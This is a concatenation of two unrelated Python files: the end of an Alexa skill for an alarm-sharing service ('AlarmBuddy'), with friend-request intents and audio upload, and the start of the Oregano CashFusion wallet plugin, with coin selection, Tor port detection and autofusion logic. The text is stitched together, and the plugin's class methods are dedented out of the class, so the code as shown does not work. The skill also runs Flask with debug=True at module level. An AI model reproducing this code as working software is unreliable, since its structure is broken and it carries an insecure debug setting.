        return question(speak_output).reprompt(speak_output).simple_card('DeleteFriend_AlreadyNotFriends', speak_output)
    delete_url = config['base_url'] + '/deleteFriend/' + config['alarmbuddy_account']['username'] + '/' + target
    outcome = requests.delete(delete_url, headers=auth)
    if outcome.status_code == 201:
        speak_output = 'Okay. Your friend ' + target + ' has been deleted.'
        return question(speak_output).reprompt(speak_output).simple_card('DeleteFriend_Success', speak_output)
    speak_output = 'Sorry. Failed to delete your friend with the name ' + target
    return question(speak_output).reprompt(speak_output).simple_card('DeleteFriend_Invalid', speak_output)
@ask.intent('AlarmBuddy_SendFriendRequest', mapping={'receiver_uname' : 'receiver_uname'})
def SendFriendRequest(receiver_uname):
    """Send a friend request from the configured account to the given username.

    Fix: the failure branch's card title was the copy-pasted
    'SendFriend_Success'; it is now 'SendFriend_Invalid', matching the
    '*_Invalid' naming used by the other intents' failure cards.
    """
    if(receiver_uname is None):
        speak_output = "Sorry, you must specify a username to send a friend request to."
        return question(speak_output).reprompt(speak_output).simple_card('AcceptFriendRequest_ReceiverIsNone', speak_output)
    receiver_uname = receiver_uname.replace(" ", "")
    # Don't send a request if the two accounts are already friends.
    header = {"Authorization": token}
    friends_list_url = config['base_url'] + '/friendsWith/' + config['alarmbuddy_account']['username']
    friends_list = requests.get(friends_list_url, headers=header).json()
    friend_found = any(friend['username2'] == receiver_uname for friend in friends_list)
    if(friend_found):
        speak_output = "Sorry, you are already friends with " + receiver_uname + "."
        return question(speak_output).reprompt(speak_output).simple_card('SendFriendRequest_AlreadyFriends', speak_output)
    #Attempt to send friend request
    send_request_url = config['base_url'] + '/sendRequest/' + config['alarmbuddy_account']['username'] + '/' + receiver_uname
    response = requests.post(send_request_url, headers=header)
    if(response.status_code == 201):
        speak_output = 'Okay. Friend request has been sent to ' + receiver_uname
        return question(speak_output).reprompt(speak_output).simple_card('SendFriend_Success', speak_output)
    else:
        speak_output = 'Sorry. Failed to send the friend request to ' + receiver_uname
        return question(speak_output).reprompt(speak_output).simple_card('SendFriend_Invalid', speak_output)
@ask.intent('AlarmBuddy_CancelFriendRequest', mapping={'receiver_uname' : 'receiver_uname'})
def CancelFriendRequest(receiver_uname):
    """Cancel an outgoing friend request previously sent by this account."""
    if receiver_uname is None:
        speak_output = "Sorry, you must specify a username to cancel a friend request for."
        return question(speak_output).reprompt(speak_output).simple_card('CancelFriendRequest_ReceiverIsNone', speak_output)
    target = receiver_uname.replace(" ", "")
    cancel_url = config['base_url'] + '/cancelFriendRequest/' + config['alarmbuddy_account']['username'] + '/' + target
    result = requests.post(cancel_url, headers={"Authorization": token})
    if result.status_code != 201:
        speak_output = 'Sorry. Failed to cancel the friend request to ' + target + '.'
        return question(speak_output).reprompt(speak_output).simple_card('CancelFriend_Invalid', speak_output)
    speak_output = 'Okay. Friend request to ' + target + ' has been cancelled.'
    return question(speak_output).reprompt(speak_output).simple_card('CancelFriend_Success', speak_output)
@ask.intent('AlarmBuddy_DenyFriendRequest', mapping={'sender_uname' : 'sender_uname'})
def DenyFriendRequest(sender_uname):
    """Deny a pending friend request from the given sender.

    Fixes: the missing-slot prompt previously talked about *sending* a
    request (copy-paste from SendFriendRequest), and the success message
    contained a stray " + " ("... from bob + has been denied.").
    """
    if(sender_uname is None):
        speak_output = "Sorry, you must specify a username to deny a friend request from."
        return question(speak_output).reprompt(speak_output).simple_card('DenyFriendRequest_SenderIsNone', speak_output)
    #Get friend requests
    sender_uname = sender_uname.replace(" ", "")
    header = {"Authorization": token}
    request_list_url = config['base_url'] + '/requests/' + config['alarmbuddy_account']['username']
    request_list = requests.get(request_list_url, headers=header).json()
    #Verify that request exists
    request_found = False
    for request in request_list:
        if request['senderUsername'] == sender_uname:
            request_found = True
    if(not request_found):
        speak_output = "Sorry, no friend request was found under the username " + sender_uname + "."
        return question(speak_output).reprompt(speak_output).simple_card('DenyFriendRequest_RequestNotFound', speak_output)
    #Deny friend request
    denyRequest_url = config['base_url'] + '/denyFriendRequest/' + config['alarmbuddy_account']['username'] + '/' + sender_uname
    response = requests.post(denyRequest_url, headers = {'Authorization' : token})
    if(response.status_code == 201):
        speak_output = 'Okay. Friend request from ' + sender_uname + ' has been denied.'
        return question(speak_output).reprompt(speak_output).simple_card('DenyFriend_Success', speak_output)
    else:
        speak_output = 'Sorry. Failed to deny the friend request from ' + sender_uname
        return question(speak_output).reprompt(speak_output).simple_card('DenyFriend_Invalid', speak_output)
@ask.intent('AlarmBuddy_AcceptFriendRequest', mapping={'sender_uname' : 'sender_uname'})
def AcceptFriendRequest(sender_uname):
    """Accept a pending friend request from the given sender."""
    if sender_uname is None:
        speak_output = "Sorry, you must specify a username to accept a friend request from."
        return question(speak_output).reprompt(speak_output).simple_card('AcceptFriendRequest_SenderIsNone', speak_output)
    sender = sender_uname.replace(" ", "")
    auth = {"Authorization": token}
    # Verify a matching incoming request actually exists.
    requests_url = config['base_url'] + '/requests/' + config['alarmbuddy_account']['username']
    pending = requests.get(requests_url, headers=auth).json()
    request_found = any(entry['senderUsername'] == sender for entry in pending)
    if not request_found:
        speak_output = "Sorry, no friend request was found under the username " + sender + "."
        return question(speak_output).reprompt(speak_output).simple_card('AcceptFriendRequest_RequestNotFound', speak_output)
    # Attempt to accept the friend request.
    accept_url = config['base_url'] + '/acceptFriendRequest/' + config['alarmbuddy_account']['username'] + '/' + sender
    outcome = requests.post(accept_url, headers = {'Authorization' : token})
    if outcome.status_code == 403:
        # Server reports the two accounts are already friends.
        speak_output = "Sorry, you are already friends with this user."
        return question(speak_output).reprompt(speak_output).simple_card('AcceptFriendRequest_SenderIsAlreadyFriend', speak_output)
    if outcome.status_code == 201:
        speak_output = 'Okay. Friend request has been accepted from ' + sender
        return question(speak_output).reprompt(speak_output).simple_card('AcceptFriendRequest_Success', speak_output)
    speak_output = 'Sorry. Failed to accept the friend request from ' + sender
    return question(speak_output).reprompt(speak_output).simple_card('AcceptFriendRequest_Invalid', speak_output)
@ask.intent('AMAZON.HelpIntent')
def help():
    # Intent designed to help the user use the application.
    # NOTE(review): this function shadows the builtin help(); harmless while
    # it is only invoked via the intent decorator, but consider renaming.
    speech_text = """You can create an alarm by saying the following: Create an alarm for date at time.
For example, create an alarm for tomorrow at eight p.m.
If you want to leave Alarm Buddy, simply say cancel or stop.
If you want to record a sound, you can say: record a sound.
You can send a friend request by saying: send friend request to bob. You can also delete friends by saying: delete friend bob.
If you want to accept or deny a friend request, say: accept friend request from bob, or, deny friend request from bob.
If you want to cancel a friend request you sent, say: cancel my friend request to bob.
You can send a friend a sound by saying: send sound 123 to bob, where 123 is a sound i.d. . to figure out the i.d., you can say: get my sounds list.
You can also get your friend requests by saying: what are my friend requests? You can also get your friends list by saying: tell me my alarm buddy friends.
You can see who you have blocked by saying: who do I have blocked?
If you want to block a user, say: block user bob. If you want to unblock a user, say: unblock user bob."""
    return question(speech_text).reprompt(speech_text).simple_card('Help', speech_text)
def record_audio(thread):
    """Record 10 seconds of microphone audio, convert it to MP3 and upload it.

    The `thread` argument is accepted but not used in this function.
    """
    sample_rate = 16000  # Hz
    duration_s = 10
    input_device = 4  # hard-coded audio device index
    recording = sd.rec(int(duration_s * sample_rate), samplerate=sample_rate, channels=2, device=input_device)
    sd.wait()  # block until the recording completes
    write('output.wav', sample_rate, recording)  # save raw capture as WAV
    AudioSegment.from_wav('output.wav').export('amazon.mp3', format='mp3')
    upload_file('amazon.mp3')
def upload_file(filename):
    """Upload an MP3 file to the AlarmBuddy backend for the configured account.

    Fix: the uploaded file is now opened via a context manager (the original
    leaked the open file handle from open(filename, 'rb')).
    """
    upload_url = config['base_url'] + '/upload/' + config['alarmbuddy_account']['username']
    upload_header = {'authorization': token}
    info_data = {'soundDescription': 'Amazon Team Alexa MP3 Upload'}
    with open(filename, 'rb') as fh:
        file_data = {'file': (filename, fh, 'audio/mpeg')}
        u = requests.post(upload_url, headers=upload_header, files=file_data, data=info_data)
    #put a check. If fails to upload, do something?
    if(u.status_code != 201):
        print("ERROR: file not uploaded.")
    else:
        print("file successfully uploaded to database from Alexa Pi.")
def play_alarm(thread):
    """Play the most recently uploaded alarm sound.

    Called at the time scheduled by the Create Alarm intent. Downloads the
    sound with the highest soundID; if the download fails, the bundled
    default alarm sound is played instead.
    Fixes: the downloaded file is now written via a context manager instead
    of leaking the handle from open(...).write(...), and the max-soundID
    scan uses max() with a default for an empty list.
    """
    sounds_url = config['base_url'] + '/sounds/' + config['alarmbuddy_account']['username']
    sounds_header = {'Authorization': token}
    f = requests.get(sounds_url, headers=sounds_header)
    sounds_list = json.loads(f.content)
    # Treat the sound with the largest soundID as the most recent upload.
    max_soundID = max((item['soundID'] for item in sounds_list), default=-1)
    download_url = config['base_url'] + '/download/' + config['alarmbuddy_account']['username'] + '/' + str(max_soundID)
    response = requests.get(download_url, headers={'Authorization': token})
    #if fails to download sound, replace sound with default.
    if(response.status_code != 200):
        sound_path = os.getcwd() + '/alarm_buddy.mp3'
    else:
        with open('downloadedsound.mp3', 'wb') as out:
            out.write(response.content)
        sound_path = os.getcwd() + '/downloadedsound.mp3'
    print('playing sound at ' + sound_path)
    playsound(sound_path)
@ask.session_ended
def session_ended():
    # Alexa session-ended hook: acknowledge with an empty JSON body and HTTP 200.
    return "{}", 200
if __name__ == '__main__':
    # Allow request-signature verification to be disabled (e.g. for local
    # testing) via the ASK_VERIFY_REQUESTS environment variable.
    if 'ASK_VERIFY_REQUESTS' in os.environ:
        verify = str(os.environ.get('ASK_VERIFY_REQUESTS', '')).lower()
        if verify == 'false':
            app.config['ASK_VERIFY_REQUESTS'] = False
app.run(debug=True) |
plugin.py | #!/usr/bin/env python3
#
# Oregano - a lightweight Ergon client
# CashFusion - an advanced coin anonymizer
#
# Copyright (C) 2020 Mark B. Lundeberg
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Base plugin (non-GUI)
"""
import math
import threading
import time
import weakref
from typing import Optional, Tuple
from oregano.address import Address
from oregano.bitcoin import COINBASE_MATURITY
from oregano.plugins import BasePlugin, hook, daemon_command
from oregano.i18n import _, ngettext, pgettext
from oregano.util import profiler, PrintError, InvalidPassword
from oregano import Network, networks
from .conf import Conf, Global
from .fusion import Fusion, can_fuse_from, can_fuse_to, is_tor_port, MIN_TX_COMPONENTS
from .server import FusionServer
from .covert import limiter
import random # only used to select random coins
# Candidate local ports probed when auto-detecting a Tor SOCKS proxy.
TOR_PORTS = [9050, 9150]
# if more than <N> tor connections have been made recently (see covert.py) then don't start auto-fuses.
AUTOFUSE_RECENT_TOR_LIMIT_LOWER = 60
# if more than <N> tor connections have been made recently (see covert.py) then shut down auto-fuses that aren't yet started
AUTOFUSE_RECENT_TOR_LIMIT_UPPER = 120
# heuristic factor: guess that expected number of coins in wallet in equilibrium is = (this number) / fraction
COIN_FRACTION_FUDGE_FACTOR = 10
# for semi-linked addresses (that share txids in their history), allow linking them with this probability:
KEEP_LINKED_PROBABILITY = 0.1
# how long an auto-fusion may stay in 'waiting' state (without starting-soon) before it cancels itself
AUTOFUSE_INACTIVE_TIMEOUT = 600
# how many random coins to select max in 1 batch -- used by select_random_coins
DEFAULT_MAX_COINS = 20
assert DEFAULT_MAX_COINS > 10
# how many autofusions can be running per-wallet
MAX_AUTOFUSIONS_PER_WALLET = 10
# cap on consolidation outputs, derived from the protocol's minimum component count
CONSOLIDATE_MAX_OUTPUTS = MIN_TX_COMPONENTS // 3
# lazily-initialized UPnP singleton, managed by get_upnp()
pnp = None
def get_upnp():
    """Return an initialized UPnP singleton (lazily created, cached in module-global `pnp`).

    Raises RuntimeError if miniupnpc is not installed, no UPnP server can be
    discovered, or connecting to the IGD fails.
    Fix: the underlying exceptions are now chained (`raise ... from e`) so
    the original cause is preserved for debugging instead of being swallowed.
    """
    global pnp
    if pnp is not None:
        return pnp
    try:
        import miniupnpc
    except ImportError as e:
        raise RuntimeError("python miniupnpc module not installed") from e
    u = miniupnpc.UPnP()
    if u.discover() < 1:
        raise RuntimeError("can't find UPnP server")
    try:
        u.selectigd()
    except Exception as e:
        raise RuntimeError("failed to connect to UPnP IGD") from e
    pnp = u
    return u
def select_coins(wallet):
    """ Sort the wallet's coins into address buckets, returning two lists:
    - Eligible addresses and their coins.
    - Ineligible addresses and their coins.
    An address is eligible if it satisfies all conditions:
    - the address is unfrozen
    - has 1, 2, or 3 utxo
    - all utxo are confirmed (or matured in case of coinbases)
    - has no SLP utxo or frozen utxo
    Returns the 5-tuple
    (eligible, ineligible, sum_value, has_unconfirmed, has_coinbase),
    where the first two entries are lists of (address, coins) pairs and
    sum_value totals ALL coins seen (eligible or not).
    """
    # First, select all the coins
    eligible = []
    ineligible = []
    has_unconfirmed = False
    has_coinbase = False
    sum_value = 0
    mincbheight = (wallet.get_local_height() + 1 - COINBASE_MATURITY if Conf(wallet).autofuse_coinbase
                   else -1) # -1 here causes coinbase coins to always be rejected
    for addr in wallet.get_addresses():
        acoins = list(wallet.get_addr_utxo(addr).values())
        if not acoins:
            continue # prevent inserting empty lists into eligible/ineligible
        good = True
        if addr in wallet.frozen_addresses:
            good = False
        for i,c in enumerate(acoins):
            sum_value += c['value'] # tally up values regardless of eligibility
            # If too many coins, any SLP tokens, any frozen coins, or any
            # immature coinbase on the address -> flag all address coins as
            # ineligible if not already flagged as such.
            good = good and (
                i < 3 # must not have too many coins on the same address*
                and not c['slp_token'] # must not be SLP
                and not c['is_frozen_coin'] # must not be frozen
                and (not c['coinbase'] or c['height'] <= mincbheight) # if coinbase -> must be mature coinbase
                )
            # * = We skip addresses with too many coins, since they take up lots
            #     of 'space' for consolidation. TODO: there is possibility of
            #     disruption here, if we get dust spammed. Need to deal with
            #     'dusty' addresses by ignoring / consolidating dusty coins.
            # Next, detect has_unconfirmed & has_coinbase:
            if c['height'] <= 0:
                # Unconfirmed -> Flag as not eligible and set the has_unconfirmed flag.
                good = False
                has_unconfirmed = True
            # Update has_coinbase flag if not already set
            has_coinbase = has_coinbase or c['coinbase']
        if good:
            eligible.append((addr,acoins))
        else:
            ineligible.append((addr,acoins))
    return eligible, ineligible, int(sum_value), bool(has_unconfirmed), bool(has_coinbase)
def select_random_coins(wallet, fraction, eligible):
    """
    Grab wallet coins with a certain probability, while also paying attention
    to obvious linkages and possible linkages.
    Returns list of list of coins (bucketed by obvious linkage).
    """
    # First, we want to bucket coins together when they have obvious linkage.
    # Coins that are linked together should be spent together.
    # Currently, just look at address.
    addr_coins = eligible
    random.shuffle(addr_coins)  # NB: shuffles the caller's list in place
    # While fusing we want to pay attention to semi-correlations among coins.
    # When we fuse semi-linked coins, it increases the linkage. So we try to
    # avoid doing that (but rarely, we just do it anyway :D).
    # Currently, we just look at all txids touched by the address.
    # (TODO this is a disruption vector: someone can spam multiple fusions'
    # output addrs with massive dust transactions (2900 outputs in 100 kB)
    # that make the plugin think that all those addresses are linked.)
    result_txids = set()
    result = []
    num_coins = 0
    for addr, acoins in addr_coins:
        # Enforce the hard cap on total coins selected in one batch.
        if num_coins >= DEFAULT_MAX_COINS:
            break
        elif num_coins + len(acoins) > DEFAULT_MAX_COINS:
            # Bucket would overflow the cap; skip it but keep trying smaller ones.
            continue
        # For each bucket, we give a separate chance of joining.
        if random.random() > fraction:
            continue
        # Semi-linkage check:
        # We consider all txids involving the address, historical and current.
        ctxids = {txid for txid, height in wallet.get_address_history(addr)}
        collisions = ctxids.intersection(result_txids)
        # Note each collision gives a separate chance of discarding this bucket.
        if random.random() > KEEP_LINKED_PROBABILITY**len(collisions):
            continue
        # OK, no problems: let's include this bucket.
        num_coins += len(acoins)
        result.append(acoins)
        result_txids.update(ctxids)
    if not result:
        # nothing was selected, just try grabbing first nonempty bucket
        try:
            res = next(coins for addr,coins in addr_coins if coins)
            result = [res]
        except StopIteration:
            # all eligible buckets were cleared.
            pass
    return result
def get_target_params_1(wallet, wallet_conf, active_autofusions, eligible):
    """ WIP -- TODO: Rename this function.

    Returns a pair (target_num_autofusions, confirmed_coins_only) based on
    the wallet's fusion mode and the currently eligible buckets.
    """
    # NOTE(review): the passed-in wallet_conf is immediately overwritten and
    # therefore ignored -- confirm whether callers rely on passing their own
    # Conf instance before removing the parameter.
    wallet_conf = Conf(wallet)
    mode = wallet_conf.fusion_mode
    # Note each fusion 'consumes' a certain number of coins by freezing them,
    # so that the next fusion has less eligible coins to work with. So each
    # call to this may see a smaller n_buckets.
    n_buckets = len(eligible)
    if mode == 'normal':
        return max(2, round(n_buckets / DEFAULT_MAX_COINS)), False
    elif mode == 'fan-out':
        return max(4, math.ceil(n_buckets / (COIN_FRACTION_FUDGE_FACTOR*0.65))), False
    elif mode == 'consolidate':
        if n_buckets < MIN_TX_COMPONENTS - CONSOLIDATE_MAX_OUTPUTS:
            # Too few eligible buckets to make an effective consolidation.
            return 0, False
        # In the latter stages of consolidation, only do one fusion
        # at a time with all-confirmed rule, to make sure each fusion's outputs
        # may be consumed by the subsequent one.
        # To avoid weird loops, try to calculate the TOTAL number of coins
        # that are either 1) eligible or 2) being fused. (Should stay constant
        # as fusions are added/cancelled)
        n_coins = sum(len(acoins) for addr,acoins in eligible)
        n_total = n_coins + sum(len(getattr(f, 'inputs', ())) for f in active_autofusions)
        if n_total < DEFAULT_MAX_COINS*3:
            return 1, True
        # If coins are scarce then don't make more autofusions unless we
        # have none.
        if n_buckets < DEFAULT_MAX_COINS*2:
            return 1, False
        # We still have lots of coins left, so request another autofusion.
        return MAX_AUTOFUSIONS_PER_WALLET, False
    else: # 'custom'
        target_num_auto = wallet_conf.queued_autofuse
        confirmed_only = wallet_conf.autofuse_confirmed_only
        return int(target_num_auto), bool(confirmed_only)
def get_target_params_2(wallet_conf, sum_value):
    """ WIP -- TODO: Rename this function.

    Decide the fraction of eligible buckets a new fusion should try to
    include, based on the wallet's fusion mode (and, for 'custom' mode, the
    user-configured selector).
    """
    mode = wallet_conf.fusion_mode
    if mode == 'consolidate':
        return 1.0
    if mode == 'normal':
        return 0.5
    if mode == 'fan-out':
        return 0.1
    if mode == 'custom':
        # Determine the fraction that should be used
        select_type, select_amount = wallet_conf.selector
        if select_type == 'size' and int(sum_value) != 0:
            # user wants to get a typical output of this size (in sats)
            return COIN_FRACTION_FUDGE_FACTOR * select_amount / sum_value
        if select_type == 'count' and int(select_amount) != 0:
            # user wants this number of coins
            return COIN_FRACTION_FUDGE_FACTOR / select_amount
        if select_type == 'fraction':
            # user wants this fraction
            return select_amount
        # note: fraction at this point could be <0 or >1 but doesn't matter.
    # Unknown mode, or a custom selector that matched nothing: default.
    return 0.1
class FusionPlugin(BasePlugin):
    # Class-level defaults (mutated at runtime):
    fusion_server = None  # presumably a locally-run FusionServer instance -- set elsewhere; TODO confirm
    active = True  # cleared by on_close(); run() returns early when False
    _run_iter = 0  # downclock counter used by run() to throttle periodic work
def __init__(self, *args, **kwargs):
    """Initialize plugin state and kick off an initial background Tor-port scan."""
    super().__init__(*args, **kwargs) # gives us self.config
    # Do an initial check on the tor port
    self.tor_port_good = None
    t = threading.Thread(name = 'Fusion-scan_torport_initial', target = self.scan_torport)
    t.start()
    # quick lock for the following two WeakKeyDictionary variables
    # Locking order wallet.lock -> plugin.lock.
    self.lock = threading.Lock()
    self.fusions = weakref.WeakKeyDictionary()  # Fusion -> creation timestamp (see start_fusion)
    self.autofusing_wallets = weakref.WeakKeyDictionary() # wallet -> password
    self.t_last_net_ok = time.monotonic()
    self.remote_donation_address: str = '' # optionally announced by the remote server in 'serverhello' message
    if tuple(self.config.get('cashfusion_server', ())) == ('cashfusion.oregano.dk', 8787, False):
        # User's config has the old default non-SSL server. If we see this,
        # just wipe the config key so that the new default is used.
        # But only reset once, after that let them go back if that is what
        # they truly desire.
        if self.config.get('cashfusion_server_defaultresetted', 0) < 1:
            self.config.set_key('cashfusion_server', None)
            self.config.set_key('cashfusion_server_defaultresetted', 1)
def on_close(self,):
    """Plugin shutdown: stop the local fusion server (if any) and mark inactive."""
    super().on_close()
    self.stop_fusion_server()
    self.active = False  # makes run() a no-op from now on
def fullname(self):
    """Return the plugin's display name."""
    return 'CashFusion'
def description(self):
    """Return a short, localized description of the plugin."""
    return _("CashFusion Protocol")
def is_available(self):
    # CashFusion is not available on the TaxCoin network.
    return networks.net is not networks.TaxCoinNet
def set_remote_donation_address(self, address : str):
    """Remember the server-announced donation address, truncated to 100 chars.

    Non-string (or empty) input is stored as ''.
    """
    if isinstance(address, str):
        self.remote_donation_address = address[:100]
    else:
        self.remote_donation_address = ''
def get_server(self, ):
    """Return the configured fusion server as a (host, port, ssl) tuple."""
    return Global(self.config).server
def set_server(self, host, port, ssl):
    """Store a new fusion server; fires on_server_changed() when the value differs."""
    gconf = Global(self.config)
    previous = gconf.server
    gconf.server = (host, port, ssl) # type/sanity checking done in setter
    if gconf.server != previous:
        self.on_server_changed()
def get_torhost(self):
    """Return the Tor host: the built-in default in auto mode, else the configured one."""
    return Global.Defaults.TorHost if self.has_auto_torport() else Global(self.config).tor_host
def set_torhost(self, host):
    ''' host should be a valid hostname; falsy values are ignored '''
    if host:
        Global(self.config).tor_host = host
def has_auto_torport(self, ):
    # True when the Tor port is autodetected rather than taken from config.
    return Global(self.config).tor_port_auto
def get_torport(self, ):
    ''' Retrieve either the manual port or the autodetected port; may return
    None in 'auto' mode when no Tor port has been autodetected yet.
    (this is non-blocking) '''
    if not self.has_auto_torport():
        return Global(self.config).tor_port_manual
    return self.tor_port_good
def set_torport(self, port):
    # port may be 'auto' or 'manual' or an int
    gconf = Global(self.config)
    if port == 'auto':
        gconf.tor_port_auto = True
        return
    else:
        gconf.tor_port_auto = False
    if port == 'manual':
        return # we're simply going to use whatever manual port was already set
    # NOTE(review): assert is stripped under python -O; consider raising
    # ValueError for invalid input instead.
    assert isinstance(port, int)
    gconf.tor_port_manual = port
def scan_torport(self, ):
    ''' Scan for Tor proxy on either the manual port or on a series of
    automatic ports. This is blocking. Returns port if it's up, or None if
    down / can't find. Updates self.tor_port_good as a side effect. '''
    host = self.get_torhost()
    if self.has_auto_torport():
        portlist = []
        # Prefer the integrated tor controller's active SOCKS port, if any,
        # then fall back to the well-known candidate ports.
        network = Network.get_instance()
        if network:
            tc = network.tor_controller
            if tc and tc.is_enabled() and tc.active_socks_port:
                portlist.append(tc.active_socks_port)
        portlist.extend(TOR_PORTS)
    else:
        portlist = [ Global(self.config).tor_port_manual ]
    for port in portlist:
        if is_tor_port(host, port):
            self.tor_port_good = port
            break
    else:
        # for/else: no candidate port responded like a Tor proxy
        self.tor_port_good = None
    return self.tor_port_good
def on_server_changed(self):
    """ When the server is changed, we stop all extant fusions that are not
    already 'running' in order to allow for the new change to take effect
    immediately. """
    self.remote_donation_address = ''  # stale: it belonged to the old server
    self.stop_all_fusions('Server changed', not_if_running=True)
def get_all_fusions(self, ):
    """ Return all still-live fusion objects that have been created using .start_fusion(),
    including autofusions and any other fusions, ordered by creation time. """
    with self.lock:
        snapshot = list(self.fusions.items())
    snapshot.sort(key=lambda kv: kv[1])
    return [fusion for fusion, _started in snapshot]
def stop_all_fusions(self, reason, *, not_if_running=True):
    """Ask every tracked fusion to stop (skipping already-running ones by default)."""
    with self.lock:
        # iterate a snapshot: the WeakKeyDictionary may shrink while we work
        for f in list(self.fusions):
            f.stop(reason, not_if_running = not_if_running)
@staticmethod
def stop_autofusions(wallet, reason, *, not_if_running=True):
    """Stop the wallet's auto-started fusions; returns the list of fusions
    whose status is 'running' after the stop request (these keep going when
    not_if_running=True)."""
    with wallet.lock:
        try:
            fusion_weakset = wallet._fusions_auto
        except AttributeError:
            # wallet was never attached via add_wallet()
            return []
        running = []
        for f in list(fusion_weakset):
            if not f.is_alive():
                # prune dead entries from the weak set
                fusion_weakset.discard(f)
                continue
            f.stop(reason, not_if_running = not_if_running)
            if f.status[0] == 'running':
                running.append(f)
        return running
def disable_autofusing(self, wallet):
    """Turn off autofusing for the wallet; returns any still-running autofusions."""
    with self.lock:
        self.autofusing_wallets.pop(wallet, None)
    Conf(wallet).autofuse = False  # persist the choice in the wallet's config
    return self.stop_autofusions(wallet, 'Autofusing disabled', not_if_running=True)
def enable_autofusing(self, wallet, password):
    """Enable autofusing for the wallet, verifying the password first.

    Raises InvalidPassword when the wallet is encrypted and no password was
    supplied (or when check_password rejects the given one).
    """
    if password is None and wallet.has_password():
        raise InvalidPassword()
    else:
        wallet.check_password(password)
    with self.lock:
        self.autofusing_wallets[wallet] = password
    Conf(wallet).autofuse = True  # persist the choice in the wallet's config
def is_autofusing(self, wallet):
    """Return True when autofusing is currently enabled for this wallet."""
    with self.lock:
        return wallet in self.autofusing_wallets
def add_wallet(self, wallet, password=None):
    ''' Attach the given wallet to fusion plugin, allowing it to be used in
    fusions with clean shutdown. Also start auto-fusions for wallets that want
    it (if no password).
    '''
    with wallet.lock:
        # Generate wallet._fusions and wallet._fusions_auto; these must
        # only be accessed with wallet.lock held.
        # all fusions relating to this wallet, either as source or target
        # or both.
        wallet._fusions = weakref.WeakSet()
        # fusions that were auto-started.
        wallet._fusions_auto = weakref.WeakSet()
        # all accesses to the above must be protected by wallet.lock
    if Conf(wallet).autofuse:
        try:
            self.enable_autofusing(wallet, password)
        except InvalidPassword:
            # wrong/missing password for an encrypted wallet: turn autofuse off
            self.disable_autofusing(wallet)
def remove_wallet(self, wallet):
    ''' Detach the provided wallet; returns list of active fusion threads. '''
    with self.lock:
        self.autofusing_wallets.pop(wallet, None)
    fusions = ()
    try:
        with wallet.lock:
            fusions = list(wallet._fusions)
            del wallet._fusions
            del wallet._fusions_auto
    except AttributeError:
        # wallet was never attached via add_wallet() -- nothing to clean up
        pass
    return [f for f in fusions if f.is_alive()]
def start_fusion(self, source_wallet, password, coins, target_wallet = None, max_outputs = None, inactive_timeout = None):
    """ Create and start a new Fusion object with current server/tor settings.
    Both source_wallet.lock and target_wallet.lock must be held.
    FIXME: this condition is begging for a deadlock to happen when the two wallets
    are different. Need to find a better way if inter-wallet fusing actually happens.
    """
    if target_wallet is None:
        target_wallet = source_wallet # self-fuse
    assert can_fuse_from(source_wallet)
    assert can_fuse_to(target_wallet)
    host, port, ssl = self.get_server()
    if host == 'localhost':
        # as a special exemption for the local fusion server, we don't use Tor.
        torhost = None
        torport = None
    else:
        torhost = self.get_torhost()
        torport = self.get_torport()
        if torport is None:
            torport = self.scan_torport() # may block for a very short time ...
        if torport is None:
            # no Tor proxy found: surface the failure in the UI and bail out
            self.notify_server_status(False, ("failed", _("Invalid Tor proxy or no Tor proxy found")))
            raise RuntimeError("can't find tor port")
    fusion = Fusion(self, target_wallet, host, port, ssl, torhost, torport)
    fusion.add_coins_from_wallet(source_wallet, password, coins)
    fusion.max_outputs = max_outputs
    with self.lock:
        fusion.start(inactive_timeout = inactive_timeout)
        # track start time so the plugin can time out / reap fusions later
        self.fusions[fusion] = time.time()
    # register with both wallets so shutdown can find and stop the fusion;
    # both wallet locks are held per the docstring above
    target_wallet._fusions.add(fusion)
    source_wallet._fusions.add(fusion)
    return fusion
def thread_jobs(self):
    """This plugin object acts as its own periodic ThreadJob."""
    return [self]
def run(self, ):
    # Periodic autofusion driver.
    # this gets called roughly every 0.1 s in the Plugins thread; downclock it to 5 s.
    run_iter = self._run_iter + 1
    if run_iter < 50:
        self._run_iter = run_iter
        return
    else:
        self._run_iter = 0
    if not self.active:
        return
    dont_start_fusions = False
    network = Network.get_instance()
    if network and network.is_connected():
        self.t_last_net_ok = time.monotonic()
    else:
        # Cashfusion needs an accurate picture of the wallet's coin set, so
        # that we don't reuse addresses and we don't submit already-spent coins.
        # Currently the network is not synced so we won't start new fusions.
        dont_start_fusions = True
        if time.monotonic() - self.t_last_net_ok > 31:
            # If the network is disconnected for an extended period, we also
            # shut down all waiting fusions. We can't wait too long because
            # one fusion might succeed but then enter the 'time_wait' period
            # where it is waiting to see the transaction on the network.
            # After 60 seconds it gives up and then will unreserve addresses,
            # and currently-waiting fusions would then grab those addresses when
            # they begin rounds.
            self.stop_all_fusions('Lost connection to Oregano server', not_if_running = True)
            return
    # Snapshot of autofusing list; note that remove_wallet may get
    # called on one of the wallets, after lock is released.
    with self.lock:
        wallets_and_passwords = list(self.autofusing_wallets.items())
    torcount = limiter.count
    if torcount > AUTOFUSE_RECENT_TOR_LIMIT_UPPER:
        # need tor cooldown, stop the waiting autofusions
        for wallet, password in wallets_and_passwords:
            self.stop_autofusions(wallet, 'Tor cooldown', not_if_running = True)
        return
    if torcount > AUTOFUSE_RECENT_TOR_LIMIT_LOWER:
        # no urgent need to stop fusions, but don't queue up any more.
        dont_start_fusions = True
    for wallet, password in wallets_and_passwords:
        with wallet.lock:
            if not hasattr(wallet, '_fusions'):
                # wallet was remove_wallet()-ed after we snapshotted
                continue
            if not wallet.up_to_date:
                # We want a good view of the wallet so we know which coins
                # are unspent and confirmed, and we know which addrs are
                # used. Note: this `continue` will bypass the potential .stop()
